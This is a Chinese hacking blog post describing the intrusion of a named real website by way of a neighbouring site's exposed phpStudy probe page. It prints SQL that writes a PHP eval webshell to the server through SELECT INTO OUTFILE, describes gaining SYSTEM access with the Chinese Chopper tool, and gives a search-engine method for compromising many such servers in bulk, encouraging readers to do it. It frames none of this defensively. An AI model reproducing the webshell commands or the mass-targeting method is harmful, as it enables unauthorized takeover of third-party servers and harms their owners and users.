简单入侵实战,附加小漏洞,批量橹服务器

小白俱乐部官方群:71816533

     我们的博客:www.xbclub.org    致力于为广大小白提供一个良好的学习环境!

我的博客:www.nonull.cn          记录生活的点点滴滴


目标站:http://www.weiquanti.com/ 

下面是简单的过程..看不懂的可以在文章末尾去下载详细录制视频。

1.随便看了一下,没有什么可利用的。

2.扫了一下旁站,发现 http://diaosizhiai.com/  phpStudy 探针...

简单入侵实战,附加小漏洞,批量橹服务器

简单入侵实战,附加小漏洞,批量橹服务器

3.果断root  链接  果然之....

4.执行sql


  1. Drop TABLE IF EXISTS xbclub;
  2. Create TABLE xbclub(cmd text NOT NULL);
  3. Insert INTO xbclub (cmd) VALUES('<?php @eval($_POST[xbclub])?>');
  4. Select cmd from xbclub into outfile 'F:/WWW/xbclub.org';
  5. Drop TABLE IF EXISTS xbclub;

简单入侵实战,附加小漏洞,批量橹服务器

5.菜刀链接。。。权限是system....

简单入侵实战,附加小漏洞,批量橹服务器

接下来服务器到手...........

简单入侵实战,附加小漏洞,批量橹服务器


附上这个小漏洞,批量拿服务器(好像有哪个大牛以前发现过,记不清楚了)

1.构造关键字:phpStudy 探针 2014

2.随便去百度或谷歌  

简单入侵实战,附加小漏洞,批量橹服务器

3.随便点个进去  root 链接...默认phpmyadmin后台,进行登录

4.重复上面的过程...百台服务器轻松到手!


附录制视频http://pan.baidu.com/s/1o6JuJ5C 密码: vg3a

小伙伴们去撸吧,根据这思路  估计其余一些主流的php环境  也可能会存在这个漏洞  0.0 

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: